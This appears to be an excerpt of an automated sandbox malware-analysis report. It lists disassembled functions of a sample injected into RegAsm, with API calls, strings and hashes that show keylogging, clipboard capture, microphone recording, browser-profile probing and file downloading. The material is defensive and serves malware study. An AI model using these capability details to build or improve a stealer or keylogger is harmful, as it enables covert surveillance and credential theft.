                                                                        • Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                                        • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                        Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                        • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                        • API String ID: 1881088180-3686566968
                                                                        • Opcode ID: ffe341345e4ad79b13a10f05b3645c8817a9f3cffb2ac3402b5cfd045c3f78ac
                                                                        • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                        • Opcode Fuzzy Hash: ffe341345e4ad79b13a10f05b3645c8817a9f3cffb2ac3402b5cfd045c3f78ac
                                                                        • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                        Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 0-711371036
                                                                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                        Function 00418B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BAA
                                                                          • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                        • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BCF
                                                                          • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                          • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                        • String ID: image/png
                                                                        • API String ID: 1291196975-2966254431
                                                                        • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                                        • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                        • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                                        • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                        Function 00449BF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                                                                        • GetFileType.KERNEL32 ref: 00449C4E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileHandleType
                                                                        • String ID: (T
                                                                        • API String ID: 3000768030-1256210051
                                                                        • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                        • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                                                                        • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                        • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                                                                        Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                        • API String ID: 481472006-1507639952
                                                                        • Opcode ID: be459fb98b3af4662d2c236266ded539e311002508a0c7527587bdc0a8c9f171
                                                                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                        • Opcode Fuzzy Hash: be459fb98b3af4662d2c236266ded539e311002508a0c7527587bdc0a8c9f171
                                                                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                        Function 0043C0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: (T
                                                                        • API String ID: 269201875-1256210051
                                                                        • Opcode ID: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
                                                                        • Instruction ID: 33e0fe0941749f3336bda6be3c0f63978f5ebcf9e4adac19a04b7d23778c801b
                                                                        • Opcode Fuzzy Hash: 02760b80b86df20b895d786181226116df47ae15e5a50630a9576685b8d3801b
                                                                        • Instruction Fuzzy Hash: A511D371A002104BEF209F39AC81B567294A714734F14162BF929EA2D5D6BCD8815F89
                                                                        Function 10007A80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: @D[
                                                                        • API String ID: 269201875-3883357871
                                                                        • Opcode ID: e45424e45f8e51279272ba7adad94846f7910451188f6bcd64545463e3b4dd00
                                                                        • Instruction ID: eb087623ed72b8a9a578691fc23b0733d814cf37bb593ea91099be3de2461304
                                                                        • Opcode Fuzzy Hash: e45424e45f8e51279272ba7adad94846f7910451188f6bcd64545463e3b4dd00
                                                                        • Instruction Fuzzy Hash: 9711E971F102616AF310DB789C81B0A37E5F7526A0F118719F515CB2E4E775D9824681
                                                                        Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32 ref: 00416640
                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DownloadFileSleep
                                                                        • String ID: !D@
                                                                        • API String ID: 1931167962-604454484
                                                                        • Opcode ID: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                                                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                        • Opcode Fuzzy Hash: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                                                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                        Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _strlen
                                                                        • String ID: : $Se.
                                                                        • API String ID: 4218353326-4089948878
                                                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                        • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                        • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                        Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                        • API String ID: 481472006-2430845779
                                                                        • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                        • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                        Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: alarm.wav$hYG
                                                                        • API String ID: 1174141254-2782910960
                                                                        • Opcode ID: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                                                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                        • Opcode Fuzzy Hash: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                                                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                        Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B172
                                                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                        • String ID: Online Keylogger Stopped
                                                                        • API String ID: 1623830855-1496645233
                                                                        • Opcode ID: 73b0eeef94ee54ff68d1284e94de7e6f85da7fd3803ffece9138dbe3b9db387d
                                                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                        • Opcode Fuzzy Hash: 73b0eeef94ee54ff68d1284e94de7e6f85da7fd3803ffece9138dbe3b9db387d
                                                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                        Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                          • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                        • String ID: Unknown exception
                                                                        • API String ID: 3476068407-410509341
                                                                        • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                        • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                        • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                        • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                        Function 00449A5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                        • DeleteCriticalSection.KERNEL32(00471090,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                                                        • _free.LIBCMT ref: 00449ACC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$DeleteEnter_free
                                                                        • String ID: (T
                                                                        • API String ID: 1836352639-1256210051
                                                                        • Opcode ID: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                                                        • Instruction ID: d8668749b8f053f3b87a5db4b07a71174a174bb0d30b2be9e7ca2d93a8738622
                                                                        • Opcode Fuzzy Hash: 54980ce14eb4704881cc4366b9e02da215daae199b46963b1b84cecc0170e34b
                                                                        • Instruction Fuzzy Hash: 491161315002149FE720DFA9D846B5D73B0FB04315F10455AE959AB2E6CBBCEC82DB0D
                                                                        Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • waveInPrepareHeader.WINMM(005291F8,00000020,?), ref: 00401849
                                                                        • waveInAddBuffer.WINMM(005291F8,00000020), ref: 0040185F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$BufferHeaderPrepare
                                                                        • String ID: XMG
                                                                        • API String ID: 2315374483-813777761
                                                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                        Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocaleValid
                                                                        • String ID: IsValidLocaleName$JD
                                                                        • API String ID: 1901932003-2234456777
                                                                        • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                        • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
                                                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                        Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                        • API String ID: 1174141254-4188645398
                                                                        • Opcode ID: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                        • Opcode Fuzzy Hash: d6df45e634b6afbccae3fd0fe3c480d2b3110c006c85663e0c742c56e2ad0e6a
                                                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                        Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                        • API String ID: 1174141254-2800177040
                                                                        • Opcode ID: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                        • Opcode Fuzzy Hash: 6b2bbaa95f382bae7588de9092395feb5a0607f01bf817232799a9fc0a715970
                                                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                        Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExistsFilePath
                                                                        • String ID: AppData$\Opera Software\Opera Stable\
                                                                        • API String ID: 1174141254-1629609700
                                                                        • Opcode ID: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                        • Opcode Fuzzy Hash: eb22ca10a5fa219f5c4dc8a07dafa017cd8c89abc0008a47340e43b7a4e1140f
                                                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                        Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                                                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                                                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
